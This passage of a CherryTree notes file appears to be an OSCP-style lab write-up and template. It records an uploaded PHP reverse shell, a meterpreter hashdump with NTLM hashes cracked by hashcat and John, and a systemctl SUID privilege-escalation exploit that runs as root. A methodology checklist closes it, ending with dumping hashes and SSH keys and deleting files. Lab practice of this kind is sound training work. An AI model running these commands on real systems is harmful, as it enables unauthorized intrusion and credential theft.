				<rich_text>
10.10.255.95:3333/internal/uploads/phpreverseshell.phtml</rich_text>
			</node>
			<node custom_icon_id="21" foreground="" is_bold="False" name="Post Exploitation" prog_lang="custom-colors" readonly="False" tags="" ts_creation="0.0" ts_lastsave="1590606029.51" unique_id="54">
				<rich_text></rich_text>
				<node custom_icon_id="44" foreground="" is_bold="False" name="Script Results" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1495714301.41" ts_lastsave="1495714310.34" unique_id="55">
					<rich_text></rich_text>
				</node>
				<node custom_icon_id="18" foreground="" is_bold="False" name="Host Information" prog_lang="custom-colors" readonly="False" tags="" ts_creation="0.0" ts_lastsave="1500474204.83" unique_id="56">
					<rich_text underline="single" weight="heavy">Operating System</rich_text>
					<rich_text>



</rich_text>
					<rich_text underline="single" weight="heavy">Architecture</rich_text>
					<rich_text>



</rich_text>
					<rich_text underline="single" weight="heavy">Domain</rich_text>
					<rich_text>



</rich_text>
					<rich_text underline="single" weight="heavy">Installed Updates</rich_text>
					<rich_text>

</rich_text>
				</node>
				<node custom_icon_id="18" foreground="" is_bold="False" name="File System" prog_lang="custom-colors" readonly="False" tags="" ts_creation="0.0" ts_lastsave="1500474208.8" unique_id="57">
					<rich_text underline="single" weight="heavy">Writeable Files\Directories</rich_text>
					<rich_text>



</rich_text>
					<rich_text underline="single" weight="heavy">Directory List</rich_text>
					<rich_text>




</rich_text>
				</node>
				<node custom_icon_id="18" foreground="" is_bold="False" name="Running Processes" prog_lang="custom-colors" readonly="False" tags="" ts_creation="0.0" ts_lastsave="1495714268.27" unique_id="58">
					<rich_text underline="single" weight="heavy">Process List</rich_text>
				</node>
				<node custom_icon_id="18" foreground="" is_bold="False" name="Installed Applications" prog_lang="custom-colors" readonly="False" tags="" ts_creation="0.0" ts_lastsave="1495714509.19" unique_id="59">
					<rich_text underline="single" weight="heavy">Installed Applications</rich_text>
				</node>
				<node custom_icon_id="18" foreground="" is_bold="False" name="Users &amp; Groups" prog_lang="custom-colors" readonly="False" tags="" ts_creation="0.0" ts_lastsave="1500474213.69" unique_id="60">
					<rich_text underline="single" weight="heavy">Users</rich_text>
					<rich_text>




</rich_text>
					<rich_text underline="single" weight="heavy">Groups</rich_text>
				</node>
				<node custom_icon_id="18" foreground="" is_bold="False" name="Network" prog_lang="custom-colors" readonly="False" tags="" ts_creation="0.0" ts_lastsave="1500474223.91" unique_id="61">
					<rich_text underline="single" weight="heavy">IPConfig\IFConfig
</rich_text>
					<rich_text>



</rich_text>
					<rich_text underline="single" weight="heavy">Network Processes</rich_text>
					<rich_text>




</rich_text>
					<rich_text underline="single" weight="heavy">ARP</rich_text>
					<rich_text>




</rich_text>
					<rich_text underline="single" weight="heavy">DNS</rich_text>
					<rich_text>




</rich_text>
					<rich_text underline="single" weight="heavy">Route</rich_text>
				</node>
				<node custom_icon_id="18" foreground="" is_bold="False" name="Scheduled Jobs" prog_lang="custom-colors" readonly="False" tags="" ts_creation="0.0" ts_lastsave="1496953428.46" unique_id="62">
					<rich_text underline="single" weight="heavy">Scheduled Tasks</rich_text>
				</node>
				<node custom_icon_id="0" foreground="" is_bold="False" name="Hashes: Hashcat" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1590606014.85" ts_lastsave="1590606044.31" unique_id="94">
					<rich_text>meterpreter &gt; hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
---
hash-identifier
HASH: ffb43f0de35be4d9917ac0cc8ad57f8d

Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))
---


hashcat --help | grep NTLM
   5500 | NetNTLMv1                                        | Network Protocols
   5500 | NetNTLMv1+ESS                                    | Network Protocols
   5600 | NetNTLMv2                                        | Network Protocols
   1000 | NTLM                                             | Operating Systems

hashcat --force -a 0 -m 1000 hashes /usr/share/wordlists/rockyou.txt
hashcat (v5.1.0) starting...

OpenCL Platform #1: The pocl project
====================================
* Device #1: pthread-Intel(R) Core(TM) i7-6820HQ CPU @ 2.70GHz, 1024/2934 MB allocatable, 1MCU

Hashes: 3 digests; 2 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Salt
* Raw-Hash

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

ATTENTION! Pure (unoptimized) OpenCL kernels selected.
This enables cracking passwords and salts &gt; length 32 but for the price of drastically reduced performance.                                                                                                   
If you want to switch to optimized OpenCL kernels, append -O to your commandline.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

* Device #1: build_opts '-cl-std=CL1.2 -I OpenCL -I /usr/share/hashcat/OpenCL -D LOCAL_MEM_TYPE=2 -D VENDOR_ID=64 -D CUDA_ARCH=0 -D AMD_ROCM=0 -D VECT_SIZE=8 -D DEVICE_TYPE=2 -D DGST_R0=0 -D DGST_R1=3 -D DGST_R2=2 -D DGST_R3=1 -D DGST_ELEM=4 -D KERN_TYPE=1000 -D _unroll'                                      
* Device #1: Kernel m01000_a0-pure.21f31112.kernel not found in cache! Building may take a while...
Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 3 secs

31d6cfe0d16ae931b73c59d7e0c089c0:                
ffb43f0de35be4d9917ac0cc8ad57f8d:alqfna22        
                                                 
Session..........: hashcat
Status...........: Cracked
Hash.Type........: NTLM
Hash.Target......: hashes
Time.Started.....: Wed May 27 14:58:56 2020 (7 secs)
Time.Estimated...: Wed May 27 14:59:03 2020 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  2165.1 kH/s (0.20ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 2/2 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 10201088/14344385 (71.12%)
Rejected.........: 0/10201088 (0.00%)
Restore.Point....: 10200064/14344385 (71.11%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: alread852 -&gt; alphasarto11

Started: Wed May 27 14:58:43 2020
Stopped: Wed May 27 14:59:04 2020
</rich_text>
				</node>
				<node custom_icon_id="0" foreground="" is_bold="False" name="Hashes: John" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1590606029.51" ts_lastsave="1590606166.33" unique_id="95">
					<rich_text>meterpreter &gt; hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
---

hash-identifier
HASH: ffb43f0de35be4d9917ac0cc8ad57f8d

Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))
---

sudo john --format=NT --rules --wordlist=/usr/share/wordlists/rockyou.txt hashes
Using default input encoding: UTF-8
Loaded 2 password hashes with no different salts (NT [MD4 256/256 AVX2 8x3])
Press 'q' or Ctrl-C to abort, almost any other key for status
                 (Administrator)
alqfna22         (Jon)
2g 0:00:00:04 DONE (2020-05-27 14:54) 0.4889g/s 2493Kp/s 2493Kc/s 2495KC/s alr19882006..alpusidi
Warning: passwords printed above might not be all those cracked
Use the &quot;--show --format=NT&quot; options to display all of the cracked passwords reliably
Session completed

</rich_text>
				</node>
			</node>
			<node custom_icon_id="0" foreground="" is_bold="False" name="Hashes: John" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1590603834.28" ts_lastsave="1590603848.08" unique_id="93">
				<rich_text>meterpreter &gt; hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::


sudo john --format=NT --rules --wordlist=/usr/share/wordlists/rockyou.txt hashes
Using default input encoding: UTF-8
Loaded 2 password hashes with no different salts (NT [MD4 256/256 AVX2 8x3])
Press 'q' or Ctrl-C to abort, almost any other key for status
                 (Administrator)
alqfna22         (Jon)
2g 0:00:00:04 DONE (2020-05-27 14:54) 0.4889g/s 2493Kp/s 2493Kc/s 2495KC/s alr19882006..alpusidi
Warning: passwords printed above might not be all those cracked
Use the &quot;--show --format=NT&quot; options to display all of the cracked passwords reliably
Session completed

</rich_text>
			</node>
			<node custom_icon_id="10" foreground="" is_bold="False" name="Priv Escalation" prog_lang="custom-colors" readonly="False" tags="" ts_creation="0.0" ts_lastsave="1590161378.81" unique_id="63">
				<rich_text weight="heavy">Service Exploited:  
Vulnerability Type:
Exploit POC:</rich_text>
				<rich_text>
</rich_text>
				<rich_text weight="heavy">Description</rich_text>
				<rich_text>: 

</rich_text>
				<rich_text underline="single" weight="heavy">Discovery of Vulnerability</rich_text>
				<rich_text>
search for all SUID bits set:
SUID gives temporary permissions to a user to run the program/file with the permission of the file owner (rather than the user who runs it).
For example, the binary file to change your password has the SUID bit set on it (/usr/bin/passwd). This is because to change your password, it will need to write to the shadowers file that you do not have access to, root does, so it has root privileges to make the right changes.

find . -perm /4000 2&gt;/dev/null
/bin/systemctl stood out

</rich_text>
				<rich_text link="webs https://medium.com/@klockw3rk/privilege-escalation-leveraging-misconfigured-systemctl-permissions-bc62b0b28d49">https://medium.com/@klockw3rk/privilege-escalation-leveraging-misconfigured-systemctl-permissions-bc62b0b28d49</rich_text>
				<rich_text>
*renamed to phtml to upload


Upgrade to PTY shell:
python -c ‘import.pty: pty.spawn(&quot;/bin/bash&quot;)’

</rich_text>
				<rich_text underline="single" weight="heavy">Exploit Code Used</rich_text>
				<rich_text>
priv=$(mktemp).service

echo '[Service]
&gt;ExecStart=/bin/bash -c “cat /root/root.txt &gt; /opt/flag”
&gt;[Install]
&gt;WantedBy=multi-user.target' &gt; $priv

#run the unit file using systemctl
/bin/systemctl link $priv
/bin/systemctl enable --now $priv

excuted as root
cat /opt/flag




</rich_text>
				<rich_text underline="single" weight="heavy">Proof\Local.txt File</rich_text>
				<rich_text>

   ☐ Screenshot with ifconfig\ipconfig
   ☐ Submit too OSCP Exam Panel

</rich_text>
			</node>
			<node custom_icon_id="43" foreground="" is_bold="False" name="Goodies" prog_lang="custom-colors" readonly="False" tags="" ts_creation="0.0" ts_lastsave="1492949508.15" unique_id="64">
				<rich_text></rich_text>
				<node custom_icon_id="18" foreground="" is_bold="False" name="Hashes" prog_lang="custom-colors" readonly="False" tags="" ts_creation="0.0" ts_lastsave="1492949998.88" unique_id="65">
					<rich_text></rich_text>
				</node>
				<node custom_icon_id="18" foreground="" is_bold="False" name="Passwords" prog_lang="custom-colors" readonly="False" tags="" ts_creation="0.0" ts_lastsave="1492950150.97" unique_id="66">
					<rich_text></rich_text>
				</node>
				<node custom_icon_id="18" foreground="" is_bold="False" name="Proof\Flags\Other" prog_lang="custom-colors" readonly="False" tags="" ts_creation="0.0" ts_lastsave="1587583059.94" unique_id="67">
					<rich_text scale="h1">Linux</rich_text>
					<rich_text>
</rich_text>
					<rich_text justification="left"></rich_text>
					<rich_text>

</rich_text>
					<rich_text scale="h1">Windows</rich_text>
					<rich_text>
</rich_text>
					<rich_text justification="left"></rich_text>
					<codebox char_offset="6" frame_height="140" frame_width="765" highlight_brackets="True" show_line_numbers="False" syntax_highlighting="sh" width_in_pixels="True">echo &quot; &quot;;echo &quot;uname -a:&quot;;uname -a;echo &quot; &quot;;echo &quot;hostname:&quot;;hostname;echo &quot; &quot;;echo &quot;id&quot;;id;echo &quot; &quot;;echo &quot;ifconfig:&quot;;/sbin/ifconfig -a;echo &quot; &quot;;echo &quot;proof:&quot;;cat /root/proof.txt 2&gt;/dev/null; cat /Desktop/proof.txt 2&gt;/dev/null;echo &quot; &quot; 

echo &quot; &quot;;echo &quot;uname -a:&quot;;uname -a;echo &quot; &quot;;echo &quot;hostname:&quot;;hostname;echo &quot; &quot;;echo &quot;id&quot;;id;echo &quot; &quot;;echo &quot;ip address:&quot;;ip address;echo &quot; &quot;;echo &quot;proof:&quot;;cat /root/proof.txt 2&gt;/dev/null; cat ./local.txt 2&gt;/dev/null;echo &quot; &quot;</codebox>
					<codebox char_offset="17" frame_height="230" frame_width="785" highlight_brackets="True" show_line_numbers="False" syntax_highlighting="dosbatch" width_in_pixels="True">echo. &amp; echo. &amp; echo whoami: &amp; whoami 2&gt; nul &amp; echo %username% 2&gt; nul &amp; echo. &amp; echo Hostname: &amp; hostname &amp; echo. &amp; ipconfig /all &amp; echo. &amp; echo proof.txt: &amp; type &quot;C:\Users\Administrator\Desktop\proof.txt&quot; 2&gt; nul &amp; type &quot;C:\Documents and Settings\Administrator\Desktop\proof.txt&quot; 2&gt; nul &amp; type %USERPROFILE%\Desktop\proof.txt 2&gt; nul

echo. &amp; echo. &amp; echo whoami: &amp; whoami 2&gt; nul &amp; echo %username% 2&gt; nul &amp; echo. &amp; echo Hostname: &amp; hostname &amp; echo. &amp; ipconfig /all &amp; echo. &amp; echo proof.txt: &amp; type &quot;C:\Users\admin\Desktop\proof.txt&quot; 2&gt; nul &amp; type &quot;C:\Documents and Settings\Administrator\Desktop\proof.txt&quot; 2&gt; nul &amp; type %USERPROFILE%\Desktop\proof.txt 2&gt; nul

#french
echo. &amp; echo. &amp; echo whoami: &amp; whoami 2&gt; nul &amp; echo %username% 2&gt; nul &amp; echo. &amp; echo Hostname: &amp; hostname &amp; echo. &amp; ipconfig /all &amp; echo. &amp; echo proof.txt: &amp; type &quot;C:\Users\Administrator\Desktop\proof.txt&quot; 2&gt; nul &amp; type &quot;C:\Docume~1\Admini~1\Bureau\proof.txt&quot; 2&gt; nul &amp; type %USERPROFILE%\bureau\proof.txt 2&gt; nul</codebox>
				</node>
			</node>
			<node custom_icon_id="12" foreground="" is_bold="False" name="Software Versions" prog_lang="custom-colors" readonly="False" tags="" ts_creation="0.0" ts_lastsave="1496953122.23" unique_id="68">
				<rich_text underline="single" weight="heavy">Software Versions
</rich_text>
				<rich_text>





</rich_text>
				<rich_text underline="single" weight="heavy">Potential Exploits</rich_text>
			</node>
			<node custom_icon_id="13" foreground="" is_bold="True" name="Methodology" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1496953072.48" ts_lastsave="1500474082.49" unique_id="69">
				<rich_text underline="single" weight="heavy">Network Scanning</rich_text>
				<rich_text>

   ☐  nmap -sn 10.11.1.*
   ☐  nmap -sL 10.11.1.*
   ☐  nbtscan -r 10.11.1.0/24
   ☐  </rich_text>
				<rich_text link="node 70">smbtree</rich_text>
				<rich_text>

</rich_text>
				<rich_text underline="single" weight="heavy">Individual Host Scanning</rich_text>
				<rich_text>

   ☐  nmap  --top-ports 20 --open -iL iplist.txt
   ☐  nmap -sS -A -sV -O -p- ipaddress
   ☐  nmap -sU ipaddress

</rich_text>
				<rich_text underline="single" weight="heavy">Service Scanning</rich_text>
				<rich_text>

    </rich_text>
				<rich_text weight="heavy">WebApp</rich_text>
				<rich_text>
      ☐   </rich_text>
				<rich_text link="node 69">Nikto</rich_text>
				<rich_text>
      ☐   </rich_text>
				<rich_text link="node 52">dirb</rich_text>
				<rich_text>
      ☐   dirbuster
      ☐   </rich_text>
				<rich_text link="node 71">wpscan</rich_text>
				<rich_text>
      ☐   dotdotpwn
      ☐   view source 
      ☐   davtest\cadevar
      ☐   droopscan
      ☐   joomscan
      ☐   LFI\RFI Test
      
    </rich_text>
				<rich_text weight="heavy">Linux\Windows</rich_text>
				<rich_text>
      ☐   snmpwalk -c public -v1 </rich_text>
				<rich_text style="italic">ipaddress</rich_text>
				<rich_text> 1
      ☐   smbclient -L //ipaddress
      ☐   showmount -e ipaddress port
      ☐   rpcinfo
      ☐   Enum4Linux
    
    </rich_text>
				<rich_text weight="heavy">Anything Else</rich_text>
				<rich_text>
      ☐   </rich_text>
				<rich_text link="node 72">nmap scripts</rich_text>
				<rich_text> (locate *nse* | grep servicename)
      ☐   </rich_text>
				<rich_text link="node 73">hydra</rich_text>
				<rich_text>
      ☐   MSF Aux Modules
      ☐   Download the softward

</rich_text>
				<rich_text underline="single" weight="heavy">Exploitation</rich_text>
				<rich_text>
   ☐   Gather Version Numbes
   ☐   Searchsploit
   ☐   Default Creds
   ☐   Creds Previously Gathered
   ☐   Download the software

</rich_text>
				<rich_text underline="single" weight="heavy">Post Exploitation</rich_text>
				<rich_text>

    </rich_text>
				<rich_text weight="heavy">Linux</rich_text>
				<rich_text>
      ☐   linux-local-enum.sh
      ☐   linuxprivchecker.py
      ☐   linux-exploit-suggestor.sh
      ☐   unix-privesc-check.py

    </rich_text>
				<rich_text weight="heavy">Windows</rich_text>
				<rich_text>
      ☐   wpc.exe
      ☐   windows-exploit-suggestor.py
      ☐   </rich_text>
				<rich_text link="webs https://github.com/pentestmonkey/windows-privesc-check/blob/master/windows_privesc_check.py">windows_privesc_check.py</rich_text>
				<rich_text>
      ☐  	windows-privesc-check2.exe

</rich_text>
				<rich_text underline="single" weight="heavy">Priv Escalation</rich_text>
				<rich_text>
   ☐  </rich_text>
				<rich_text link="node 74">acesss internal services (portfwd)</rich_text>
				<rich_text>
   ☐  add account

</rich_text>
				<rich_text weight="heavy">Windows</rich_text>
				<rich_text>
   ☐  List of exploits

</rich_text>
				<rich_text weight="heavy">Linux</rich_text>
				<rich_text>
   ☐  sudo su 
   ☐  KernelDB
   ☐  Searchsploit

</rich_text>
				<rich_text underline="single" weight="heavy">Final</rich_text>
				<rich_text>
   ☐  Screenshot of IPConfig\WhoamI
   ☐  Copy proof.txt
   ☐  Dump hashes 
   ☐  Dump SSH Keys
   ☐  Delete files</rich_text>
			</node>
			<node custom_icon_id="20" foreground="" is_bold="True" name="Log Book" prog_lang="custom-colors" readonly="False" tags="" ts_creation="0.0" ts_lastsave="1495714168.37" unique_id="75">
				<rich_text></rich_text>
			</node>
		</node>
	</node>
</cherrytree>
